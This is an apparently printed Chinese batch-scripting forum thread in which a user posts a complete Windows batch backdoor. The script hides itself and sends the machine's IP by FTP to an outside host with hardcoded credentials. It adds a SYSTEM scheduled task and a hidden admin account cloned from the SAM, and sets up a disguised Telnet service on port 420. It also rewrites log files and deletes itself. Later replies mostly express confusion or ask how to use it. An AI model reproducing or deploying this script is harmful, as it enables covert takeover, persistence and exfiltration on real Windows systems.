Board logo

标题: [网络工具] 闲来无事写了个批处理后门 [打印本页]

作者: lxzzr    时间: 2008-3-13 13:35     标题: 闲来无事写了个批处理后门

  1. @echo off
  2. cls
  3. if "%1" == "h" goto begin
  4. mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
  5. :begin
  6. time /t>>time.txt
  7. for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
  8. del time.txt /q
  9. ipconfig>>ipconfig.txt
  10. for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
  11. echo open lxz.0moola.com 21>a
  12. echo lxz.0moola.com>>a
  13. echo 1052104151>>a
  14. echo bin>>a
  15. echo put ip.txt /IP/%ip%.txt>>a
  16. echo by>>a
  17. ftp.exe -s:a
  18. del ipconfig.txt /q
  19. del ip.txt /q
  20. del a /q
  21. sc config Schedule start= auto
  22. net start schedule
  23. schtasks /create /tn Monitor /tr %SystemRoot%\system32\inetser.bat /sc onlogon /ru system
  24. echo inetscr.exe -s:%SystemRoot%\system32\a >>%SystemRoot%\system32\inetser.bat
  25. echo open 本机IP 端口>%SystemRoot%\system32\a
  26. copy %SystemRoot%\system32\ftp.exe %SystemRoot%\system32\inetscr.exe
  27. attrib +s +h %SystemRoot%\system32\a
  28. attrib +s +h %SystemRoot%\system32\inetscr.exe
  29. attrib +s +h %SystemRoot%\tasks\Monitor.job
  30. reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v forceguest /f /t REG_DWORD /d 00000000
  31. echo Windows Registry Editor Version 5.00 >>c:\h.reg
  32. echo. >>c:\h.reg
  33. echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\lxz$] >>c:\h.reg
  34. echo @=hex(1f7): >>c:\h.reg
  35. echo regedit /s c:\h.reg >>c:\h.bat
  36. echo del c:\h.reg /q >>c:\h.bat
  37. echo REG add HKLM\SAM\SAM\Domains\Account\Users\000001F7 >>c:\h.bat
  38. echo REG COPY HKLM\SAM\SAM\Domains\Account\Users\000001F4 HKLM\SAM\SAM\Domains\Account\Users\000001F7 /s /f >>c:\h.bat
  39. echo net user lxz$ lxz>>c:\h.bat
  40. echo del c:\h.bat /q >>c:\h.bat
  41. at 10:00 c:\h.bat
  42. schtasks /run /tn at1
  43. schtasks /run /tn Monitor
  44. tlntadmn config sec = -ntlm
  45. tlntadmn config port = 420
  46. copy %SystemRoot%\system32\tlntsvr.exe %SystemRoot%\system32\inetsvr.exe
  47. attrib +s +h %SystemRoot%\system32\inetsvr.exe
  48. echo [Version] >>c:\inetsvr.inf
  49. echo Signature="$WINDOWS NT$" >>c:\inetsvr.inf
  50. echo [DefaultInstall.Services] >>c:\inetsvr.inf
  51. echo AddService=inetsvr,,My_AddService_Name >>c:\inetsvr.inf
  52. echo [My_AddService_Name] >>c:\inetsvr.inf
  53. echo DisplayName=Windows Internet Service >>c:\inetsvr.inf
  54. echo Description=提供对 Internet 信息服务管理的支持。>>c:\inetsvr.inf
  55. echo ServiceType=0x10 >>c:\inetsvr.inf
  56. echo StartType=2 >>c:\inetsvr.inf
  57. echo ErrorControl=0 >>c:\inetsvr.inf
  58. echo ServiceBinary=%SystemRoot%\system32\inetsvr.exe >>c:\inetsvr.inf
  59. rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf
  60. del c:\inetsvr.inf /q
  61. net start inetsvr
  62. net stop schedule
  63. for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
  64. for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
  65. for /r %%c in (*.evt) do find "本机IP" >nul %%c && echo 1980>%%c
  66. for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
  67. net start schedule
  68. schtasks /delete /tn at1 /f
  69. del %0 /q
  70. del lxz.bat /q
复制代码

作者: 随风    时间: 2008-3-13 16:11

请用[ code] 和 [/code] 标记把代码部分首尾括起来,以便他人复制;
作者: tornodo    时间: 2008-3-15 21:48

看不懂啊,慢慢研究下。
作者: hu147    时间: 2010-11-7 18:33     标题: 看不懂啊,慢慢研究下。

看不懂啊,慢慢研究下。
作者: hotbooy    时间: 2010-11-16 11:57

有点晕晕的,,,,不过,,我知道,,,这是个高手,,,,
作者: fweiger    时间: 2011-1-2 05:58

看了下 懂了部分! 但是批处理想导入注册表成功的概率似乎,(ps 特别的有杀毒软件的,我用批处理修改显隐属性,360就会弹对话框! 我郁闷!)
另外我看到您在安装inf的时候 使用的是 128  

  1. rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\inetsvr.inf
复制代码


之前在百度查找到的方法是132的 不知道这个数字不同有什么区别!?

非常感谢
作者: FenoX    时间: 2022-12-17 20:38

怎么用嘞???




欢迎光临 批处理之家 (http://bathome.net./) Powered by Discuz! 7.2